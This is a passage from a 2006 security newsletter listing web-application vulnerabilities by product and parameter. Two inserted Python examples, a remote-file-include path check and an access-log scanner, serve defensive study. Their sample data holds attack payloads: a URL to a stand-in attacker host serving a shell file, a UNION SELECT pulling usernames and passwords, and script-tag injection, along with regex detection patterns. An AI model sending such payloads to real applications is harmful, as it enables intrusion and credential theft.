  • Description: MVN Forum is a web-based bulletin board. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "member" and "activatecode" parameters. MVN Forum versions 1.0 GA and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2006/06/mvnforum-xss-vuln.html

  • 06.26.35 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: QaTraq Multiple Cross-Site Scripting Vulnerabilities
  • Description: QaTraq is a web-based task management application targeted at software testing. It is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize HTML and script code from URI input. QaTraq version 6.5 is affected.
  • Ref: http://www.securityfocus.com/bid/18620

  • 06.26.36 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: BlueDragon Server Error Page Cross-Site Scripting
  • Description: BlueDragon is a ColdFusion Markup Language (CFML) server. It is exposed to a cross-site scripting issue due to insufficient sanitization of user-supplied URI input. BlueDragon Server versions JX 6.2.1.286 and J2EE 6.2.1.286 are affected.
  • Ref: http://www.securityfocus.com/bid/18623

  • 06.26.37 - CVE: CVE-2006-3257
  • Platform: Web Application - Cross Site Scripting
  • Title: Claroline Multiple Unspecified Cross-Site Scripting Vulnerabilities
  • Description: Claroline is a collaborative-learning application. It is prone to multiple cross-site scripting vulnerabilities. Claroline versions 1.7.7 and earlier are affected.
  • Ref: http://www.securityfocus.com/archive/1/438343

  • 06.26.38 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: MF Piadas Admin.PHP Cross-Site Scripting
  • Description: MF Piadas is a web-based forum application. It is prone to a cross-site scripting vulnerability due to improper sanitization of user-supplied input to the "page" parameter of the "admin.php" script. MF Piadas version 1.0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/438496

  • 06.26.39 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: H-Sphere Multiple Cross-Site Scripting Vulnerabilities
  • Description: H-Sphere is a multi-server web hosting solution. Insufficient sanitization of user-supplied input to the "next_template", "start", "curr_menu_id" and "arid" parameters exposes the application to multiple cross-site scripting issues. H-Sphere version 2.5.1 Beta 1 is affected.
  • Ref: http://pridels.blogspot.com/2006/06/h-sphere-25x-xss-vuln.html

  • 06.26.40 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: SiteBar Command.PHP Cross-Site Scripting
  • Description: SiteBar is an online bookmark manager. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "command" parameter of the "command.php" script. SiteBar versions 3.3.8 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/bid/18680/info

  • 06.26.41 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Phorum Read.PHP Cross-Site Scripting
  • Description: Phorum is a web-based forum application. It is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input to an unspecified parameter of the "read.php" script. Phorum version 5.1.13 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/18683

  • 06.26.42 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Hostflow New_Ticket.CGI Cross-Site Scripting
  • Description: Hostflow is a help desk application. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "desc" parameter of the "new_ticket.cgi" script. Hostflow versions 2.2.14 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2006/06/hostflow-vuln.html

  • 06.26.43 - CVE: CVE-2006-3174
  • Platform: Web Application - Cross Site Scripting
  • Title: SquirrelMail Search.PHP Cross-Site Scripting
  • Description: SquirrelMail is a web-based email (webmail) application. It is prone to a cross-site scripting vulnerability due to insufficient sanitization of the "mailbox" parameter of the "search.php" script. SquirrelMail versions 1.5.1 and earlier are vulnerable.
  • Ref: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=375782

  • 06.26.44 - CVE: CVE-2006-2795
  • Platform: Web Application - Cross Site Scripting
  • Title: XiTi Tracking Script Xiti.JS Cross-Site Scripting
  • Description: XiTi tracking script monitors web traffic. It is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied input to the "xtref" parameter of the "xiti.js" script. XiTi versions 7 RC 0 and earlier are vulnerable.
  • Ref: http://www.osvdb.org/25844

  • 06.26.45 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Absolute Image Gallery XE Multiple Cross-Site Scripting Vulnerabilities
  • Description: Absolute Image Gallery XE is a web-based gallery application. It is vulnerable to multiple cross-site scripting issues due to insufficient sanitization of user-supplied input to various scripts. Absolute Image Gallery XE versions 2.0 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2006/03/absolute-image-gallery-xe-20-xss-vuln.html

  • 06.26.46 - CVE: CVE-2006-3267
  • Platform: Web Application - SQL Injection
  • Title: Infinite Core Technologies ICT INDEX.PHP SQL Injection
  • Description: Infinite Core Technologies ICT is a web-based application. ICT is prone to an SQL injection issue due to insufficient sanitization of the "post" parameter of the "index.php" script. All current versions are affected.
  • Ref: http://pridels.blogspot.com/2006/06/ict-infinite-core-technologies-vuln.html

  • 06.26.47 - CVE: CVE-2006-3304
  • Platform: Web Application - SQL Injection
  • Title: DeluxeBB CP.PHP SQL Injection
  • Description: DeluxeBB is a web-based bulletin board. Insufficient sanitization of the "xmsn" parameter in the "cp.php" script exposes the application to an SQL injection issue. All current versions are affected.
  • Ref: http://www.milw0rm.com/exploits/1953

  • 06.26.48 - CVE: CVE-2006-3244
  • Platform: Web Application - SQL Injection
  • Title: Anthill Multiple SQL Injection Vulnerabilities
  • Description: Anthill is a web-based bug tracking system. It is prone to multiple SQL injection vulnerabilities due to insufficient sanitization of user-supplied input to the "order" parameter of "buglist.php" and the "bug" parameter of "query.php". Anthill versions 0.3 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/18661

  • 06.26.49 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: YaBB SE Profile.php SQL Injection
  • Description: YaBB SE is a web-based bulletin board application. Insufficient sanitization of the "user" parameter of the "profile.php" script exposes the application to an SQL injection issue. All current versions are affected.
  • Ref: http://archives.neohapsis.com/archives/fulldisclosure/2006-06/0606.html

  • 06.26.50 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Scout Portal Toolkit ForumTopics.PHP SQL Injection
  • Description: Scout Portal Toolkit is a web-based portal application that includes a discussion forum component. It is vulnerable to an SQL injection issue because it fails to sanitize user-supplied input to the "forumid" parameter of the "ForumTopics.php" script. Scout Portal Toolkit versions 1.4.0 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/bid/18688/info

  • 06.26.51 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: VCard PRO Multiple SQL Injection Vulnerabilities
  • Description: VCard PRO is a greeting card application. It is exposed to multiple SQL injection issues due to insufficient sanitization of user-supplied input. Belchior Foundry vCard PRO version 0 is affected.
  • Ref: http://www.securityfocus.com/archive/1/438589

  • 06.26.52 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Blog:CMS Index.PHP SQL Injection
  • Description: Blog:CMS is a web-based publishing application. Insufficient sanitization of the "id" parameter of the "index.php" script exposes the application to multiple SQL injection issues. All current versions are affected.
  • Ref: http://www.securityfocus.com/archive/1/438603

  • 06.26.53 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: PatchLink Update Checkprofile.ASP SQL Injection
  • Description: PatchLink Update is a patch management application. It is prone to an SQL injection vulnerability in the "checkprofile.asp" script. Novell ZENworks Patch Management is vulnerable as well because it is based on PatchLink technology. Versions 6.1 and 6.2 of the product are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/438710

  • 06.26.54 - CVE: Not Available
  • Platform: Web Application - SQL Injection
  • Title: Xoops MyAds Module Annonces-p-f.PHP SQL Injection
  • Description: Xoops MyAds Module is a web-based publishing application. Insufficient sanitization of the "lid" parameter of the "annonces-p-f.php" script exposes the application to an SQL injection issue. All current versions are affected.
  • Ref: http://milw0rm.com/exploits/1961

  • 06.26.55 - CVE: Not Available
  • Platform: Web Application
  • Title: DreamAccount Auth.api.PHP Remote File Include
  • Description: DreamAccount is a membership management tool. Insufficient sanitization of the "path" parameter in the "auth.api.php" script exposes the application to a remote file include issue. All current versions are affected.
  • Ref: http://www.milw0rm.com/exploits/1954

  • 06.26.56 - CVE: CVE-2006-3269
  • Platform: Web Application
  • Title: THoRCMS Functions_cms.PHP Remote File Include
  • Description: THoRCMS is an add-on for phpBB. It is prone to a remote file include vulnerability due to insufficient sanitization of user-supplied input to the "phpbb_root_path" parameter of the "functions_cms.php" script. THoRCMS version 1.3.1 is affected.
  • Ref: http://www.securityfocus.com/bid/18637

  • 06.26.57 - CVE: CVE-2006-3162
  • Platform: Web Application
  • Title: SmartSiteCMS Inc_Foot.PHP Remote File Include
  • Description: SmartSiteCMS is a web-based content management application. It is vulnerable to a remote file include issue due to insufficient sanitization of user-supplied input to the "root" parameter of the "include/inc_foot.php" script. SmartSiteCMS versions 1.0 and earlier are vulnerable.
  • Ref: http://www.frsirt.com/english/advisories/2006/2478

  • 06.26.58 - CVE: Not Available
  • Platform: Web Application
  • Title: phpMySms Gateway.PHP Remote File Include
  • Description: phpMySms is a web application designed for sending SMS messages. Insufficient sanitization of the "ROOT_PATH" parameter of the "sms_config/gateway.php" script exposes the application to a remote file include issue. phpMySms version 2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/18633/info

  • 06.26.59 - CVE: Not Available
  • Platform: Web Application
  • Title: Bee-hive Multiple Remote File Include Vulnerabilities
  • Description: Bee-hive is a web-based content management application. Insufficient sanitization of user-supplied input exposes the application to multiple remote file include issues. Bee-hive version 1.2 is affected.
  • Ref: http://milw0rm.com/exploits/1951

  • 06.26.60 - CVE: CVE-2006-3302
  • Platform: Web Application
  • Title: CBSMS Mambo Module Mod_CBSMS_Messages.PHP Remote File Include
  • Description: CBSMS is an SMS module for Mambo. Mambo is a web-based content management system (CMS) written in PHP. CBSMS is prone to a remote file include vulnerability due to insufficient sanitization of the "mosConfig_absolute_path" parameter of the "mod_cbsms_messages.php" script. CBSMS mod-cbsms version 1.0 is affected.
  • Ref: http://www.milw0rm.com/exploits/1955

  • 06.26.61 - CVE: CVE-2006-3292
  • Platform: Web Application
  • Title: Jaws Search Gadget Multiple Input Validation Vulnerabilities
  • Description: Jaws is a web-based application framework and content management application. It is vulnerable to multiple input validation issues due to insufficient sanitization of user-supplied input to various scripts. Jaws version 0.6.2 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/438434

  • 06.26.62 - CVE: Not Available
  • Platform: Web Application
  • Title: Custom Dating Biz Multiple Input Validation Vulnerabilities
  • Description: Custom Dating Biz is a web-based dating application. It is vulnerable to multiple input validation issues due to insufficient sanitization of user-supplied input to various scripts. Custom Dating Biz version 1.0 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/438195

  • 06.26.63 - CVE: CVE-2006-3306
  • Platform: Web Application
  • Title: bbsengine Multiple Input Validation Vulnerabilities
  • Description: bbsengine is a web-based bulletin board system. Insufficient sanitization of user-supplied input exposes the application to multiple SQL injection and cross-site scripting issues. All current versions are affected.
  • Ref: http://www.securityfocus.com/bid/18627/info

  • 06.26.64 - CVE: Not Available
  • Platform: Web Application
  • Title: OpenGuestbook Multiple Input Validation Vulnerabilities
  • Description: OpenGuestbook is a guest book application. It is exposed to multiple input validation issues like cross-site scripting and SQL injection due to insufficient sanitization of user-supplied input. OpenGuestbook version 0.5 is affected.
  • Ref: http://www.securityfocus.com/archive/1/438381

  • 06.26.65 - CVE: CVE-2006-3011
  • Platform: Web Application
  • Title: PHP Error_Log Safe_Mode Restriction Bypass
  • Description: PHP's error_log() function can be abused to bypass the safe_mode and open_basedir restrictions that shared hosting configurations commonly rely on to keep one customer's scripts away from another's files. PHP versions 4.4.2 and 5.1.4 are vulnerable.
  • Ref: http://securityreason.com/achievement_securityalert/41

  • 06.26.66 - CVE: Not Available
  • Platform: Web Application
  • Title: CrisoftRicette Cookbook.PHP Remote File Include
  • Description: CrisoftRicette is a recipe management database. It is exposed to a remote file include issue due to insufficient sanitization of user-supplied input to the "crisoftricette" parameter of the "cookbook.php" script. CrisoftRicette version 1.0 pre15b is affected.
  • Ref: http://www.securityfocus.com/archive/1/438459

  • 06.26.67 - CVE: Not Available
  • Platform: Web Application
  • Title: MF Piadas Admin.PHP Remote File Include
  • Description: MF Piadas is a web-based forum application. It is vulnerable to a remote file include issue due to insufficient sanitization of user-supplied input to the "page" parameter of the "admin.php" script. MF Piadas version 1.0 is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/438496

  • 06.26.68 - CVE: Not Available
  • Platform: Web Application
  • Title: Zorum Multiple SQL Injection Vulnerabilities
  • Description: Zorum is a web-based forum application. It is exposed to multiple SQL injection issues due to insufficient sanitization of user-supplied input to various parameters of the "index.php" script. PHPOutsourcing Zorum versions 3.5 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/18681/info

  • 06.26.69 - CVE: Not Available
  • Platform: Web Application
  • Title: Pearl For Mambo Module Remote File Include Vulnerabilities
  • Description: Pearl is a module for Mambo. Mambo is a web-based content management system (CMS). It is exposed to multiple remote file include vulnerabilities due to insufficient sanitization of user-supplied input to the "GlobalSettings[templatesDirectory]" parameter of various scripts. Pearl for Mambo versions 1.6 and 1.5 are affected.
  • Ref: http://www.securityfocus.com/bid/18690

  • 06.26.70 - CVE: Not Available
  • Platform: Web Application
  • Title: SmartSiteCMS Multiple Remote File Include
  • Description: SmartSiteCMS is a web-based content management application. Insufficient sanitization of user-supplied input exposes the application to multiple remote file include issues. All current versions are affected.
  • Ref: http://www.securityfocus.com/archive/1/438581

  • 06.26.71 - CVE: CVE-2006-3291
  • Platform: Web Application
  • Title: Cisco Access Point Web Interface Authorization Bypass
  • Description: The Cisco Access Point web-based management interface is vulnerable to an authorization bypass. Because of a design error, under certain unspecified conditions the default security configuration, which requires authentication for management access, can be removed, leaving the management interface reachable without credentials. Cisco Access Points running Cisco IOS Software Release 12.3(8)JA or 12.3(8)JA1 are vulnerable.
  • Ref: http://www.cisco.com/warp/public/707/cisco-sa-20060628-ap.shtml

  • 06.26.72 - CVE: Not Available
  • Platform: Web Application
  • Title: MyBB Multiple Input Validation Vulnerabilities
  • Description: MyBB is a bulletin board application. It is vulnerable to multiple input validation issues due to insufficient sanitization of user-supplied input to various scripts. MyBulletinBoard version 1.1.4 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/bid/18702/info

  • 06.26.73 - CVE: Not Available
  • Platform: Web Application
  • Title: RsGallery2 RSGallery2.PHP Remote File Include
  • Description: RsGallery2 is a gallery plugin for Joomla. It is exposed to a remote file include issue due to insufficient sanitization of user-supplied input to the "mosConfig_absolute_path" parameter of the "rsgallery2.php" and "rsgallery2.html.php" scripts. Joomla RsGallery2 version 1.11.2 is affected.
  • Ref: http://www.securityfocus.com/bid/18705
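The remote file include entries above (CBSMS, THoRCMS, phpMySms, SmartSiteCMS, RsGallery2 and others) share one pattern: a request-controlled "root path" parameter such as "mosConfig_absolute_path", "phpbb_root_path" or "ROOT_PATH" is used as the prefix of an include() path, so a value like "http://attacker.example/shell.txt?" makes the interpreter fetch and execute remote code. The following is an added example, not code from the newsletter or from any of the products listed: it shows the include target that the vulnerable pattern produces, and a path-confinement check that rejects URL schemes, PHP stream wrappers, absolute paths and traversal before anything is included. The document root, file names and attacker URL are hypothetical.

```python
import os
import tempfile
from urllib.parse import urlsplit

# Hypothetical document root, created fresh so the example runs anywhere.
DOCROOT = os.path.realpath(tempfile.mkdtemp(prefix="app-docroot-"))


def vulnerable_include_target(root_param: str, relative: str) -> str:
    """The pattern the advisories describe: the include target is built by
    prefixing a request-controlled "root path" parameter.  Only the
    resulting string is returned, to show what the interpreter would be
    asked to load; nothing is included or fetched here.  With a URL ending
    in '?', the fixed suffix becomes a query string the attacker ignores."""
    return root_param + "/" + relative


def resolve_include(base_dir: str, requested: str) -> str:
    """Return an absolute path under base_dir, or raise ValueError.

    Rejects empty values, NUL bytes, anything with a URL scheme (http://,
    ftp://, php://, data:, ...), absolute paths, and any path that still
    escapes base_dir after symlink and '..' normalisation."""
    if not requested or "\x00" in requested:
        raise ValueError("empty or NUL-containing path")
    if urlsplit(requested).scheme:
        # Any scheme means a remote or virtual stream, not a file under base_dir.
        raise ValueError("URL scheme not allowed: %r" % requested)
    if os.path.isabs(requested):
        raise ValueError("absolute path not allowed: %r" % requested)
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # Compare against base + separator so "/srv/app2" does not pass for "/srv/app".
    if candidate != base and not candidate.startswith(base + os.sep):
        raise ValueError("path escapes base directory: %r" % requested)
    return candidate


def is_safe_include(base_dir: str, requested: str) -> bool:
    """Boolean wrapper around resolve_include for callers that only need yes/no."""
    try:
        resolve_include(base_dir, requested)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    attacker = "http://attacker.example/shell.txt?"
    print("vulnerable pattern would include:",
          vulnerable_include_target(attacker, "includes/functions_cms.php"))
    for p in ["includes/functions_cms.php", attacker, "php://input",
              "../../etc/passwd", "/etc/passwd"]:
        print("%-40s safe=%s" % (p, is_safe_include(DOCROOT, p)))
```

The realpath comparison, rather than a string prefix test on the raw input, is what makes the traversal case hold: "includes/../../etc/passwd" is normalised before the check, and a symlink inside the document root that points outside it is resolved too.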

  • 06.26.74 - CVE: Not Available
  • Platform: Web Application
  • Title: MKPortal Index.PHP Directory Traversal
  • Description: MKPortal is a content management system for the vBulletin package. It is prone to a directory traversal vulnerability. This issue affects MKPortal version 1.0.1 Final.
  • Ref: http://www.securityfocus.com/bid/18707

  • 06.26.75 - CVE: CVE-2006-1435
  • Platform: Web Application
  • Title: Pre Shopping Mall Multiple Input Validation Vulnerabilities
  • Description: Pre Shopping Mall is a shopping cart application. It is prone to multiple HTML injection and cross-site scripting vulnerabilities due to insufficient sanitization of user-supplied input to various scripts. Pre Shopping Mall version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/18706

  • 06.26.76 - CVE: Not Available
  • Platform: Web Application
  • Title: CosmicShoppingCart Multiple Input Validation Vulnerabilities
  • Description: CosmicShoppingCart is a web-based e-commerce shopping cart application. Insufficient sanitization of the "query" and "max" parameters of the "search.php" script exposes the application to SQL injection and cross-site scripting issues.
  • Ref: http://www.securityfocus.com/bid/18709/info

  • 06.26.77 - CVE: Not Available
  • Platform: Web Application
  • Title: phpclassifieds.info Multiple Input Validation Vulnerabilities
  • Description: phpclassifieds.info is a web-based classified ad script. It is exposed to multiple input validation vulnerabilities due to insufficient sanitization of user-supplied input. phpclassifieds.info version 0 is affected.
  • Ref: http://www.securityfocus.com/bid/18713

  • 06.26.78 - CVE: Not Available
  • Platform: Web Application
  • Title: PHP/MySQL Classifieds AddAsset1.PHP Multiple HTML Injection Vulnerabilities
  • Description: PHP/MySQL Classifieds is a web-based classifieds application. It is prone to multiple HTML injection vulnerabilities due to insufficient sanitization of user-supplied input to multiple fields of the "AddAsset1.PHP" script.
  • Ref: http://www.securityfocus.com/bid/18717
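Most of the web application entries in this issue are reachable through a single GET parameter, which means attempts against them leave a trace in ordinary access logs. The following is an added example, not from the newsletter or any vendor: a small scanner that parses combined-format access log lines, URL-decodes each query parameter and flags values that look like a remote file include (a URL or PHP stream wrapper where a path is expected), SQL injection or cross-site scripting. The log lines are constructed for the example; the client addresses, paths and attacker host are hypothetical, while the script and parameter names are borrowed from the advisories above so the output maps back to them.

```python
import re
from collections import namedtuple
from urllib.parse import parse_qsl, unquote, urlsplit

Finding = namedtuple("Finding", "line kind param value")

# Combined log format: client ident user [time] "METHOD URI PROTO" status bytes ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (.+?) (HTTP/[\d.]+)" (\d{3}) (\S+)')

# A path parameter that starts with a URL scheme or PHP stream wrapper is the
# remote-file-include signature.  The scheme list is the common set; extend it.
RFI_RE = re.compile(r"^\s*(https?|ftps?|php|data|file|expect|phar)\s*:", re.I)
SQLI_RES = [
    re.compile(r"'\s*(?:(or|and|union|select)\b|;)", re.I),  # quote break, then SQL
    re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    re.compile(r"(?<!\w)--\s*$|/\*.*\*/", re.S),              # comment terminators
]
XSS_RES = [
    re.compile(r"<\s*/?\s*(script|iframe|img|svg|object|embed)\b", re.I),
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),                      # onload=, onerror=, ...
]

# Constructed sample (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [28/Jun/2006:10:15:32 +0000] "GET /forum/read.php?1,42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Jun/2006:10:15:40 +0000] "GET /mambo/modules/mod_cbsms_messages.php?mosConfig_absolute_path=http://attacker.example/shell.txt? HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Jun/2006:10:15:51 +0000] "GET /deluxebb/cp.php?xmsn=1%27%20UNION%20SELECT%20username%2Cpassword%20FROM%20users-- HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Jun/2006:10:16:02 +0000] "GET /squirrelmail/src/search.php?mailbox=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 1790 "-" "Mozilla/5.0"
198.51.100.23 - - [28/Jun/2006:10:16:15 +0000] "GET /hostflow/new_ticket.cgi?desc=Printer+on+floor+3+is+down HTTP/1.1" 200 980 "-" "Mozilla/5.0"
198.51.100.23 - - [28/Jun/2006:10:16:30 +0000] "GET /piadas/admin.php?page=about HTTP/1.1" 200 1400 "-" "Mozilla/5.0"
"""


def classify_value(value: str) -> set:
    """Return the set of attack classes a parameter value matches.

    The value is percent-decoded once more here, so a caller that already
    decoded it (as scan_log does via parse_qsl) also catches double-encoded
    payloads such as %2527 -> %27 -> '."""
    decoded = unquote(value)
    kinds = set()
    if RFI_RE.search(decoded):
        kinds.add("rfi")
    if any(r.search(decoded) for r in SQLI_RES):
        kinds.add("sqli")
    if any(r.search(decoded) for r in XSS_RES):
        kinds.add("xss")
    return kinds


def scan_log(lines) -> list:
    """Parse each access-log line; return Findings with 1-based line numbers."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line: skip rather than guess
        query = urlsplit(m.group(4)).query
        # keep_blank_values so "?param=" is still inspected; parse_qsl
        # percent-decodes and turns '+' into a space.
        for name, value in parse_qsl(query, keep_blank_values=True):
            for kind in sorted(classify_value(value)):
                findings.append(Finding(lineno, kind, name, value))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print("line %d: %-4s param=%s value=%r" % f)
```

Signature matching of this kind is a triage aid, not a control: a successful attack against a parameter that was never sanitized needs no encoding tricks, so the real fix is the patch or the input handling, and a POST body or header-based payload never appears in the request line at all.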

  • 06.26.79 - CVE: CVE-2006-3226
  • Platform: Network Device
  • Title: Cisco Secure ACS Authentication Bypass
  • Description: Cisco Secure ACS (Access Control Server) is an authentication, authorization, and accounting software package. It is vulnerable to an authentication bypass issue because of an insecure session management feature. Cisco Secure ACS for Windows versions 4.x series are vulnerable.
  • Ref: http://www.cisco.com/warp/public/707/cisco-sr-20060623-acs.shtml

(c) 2006. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

==end==

Subscriptions: @RISK is distributed free of charge to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.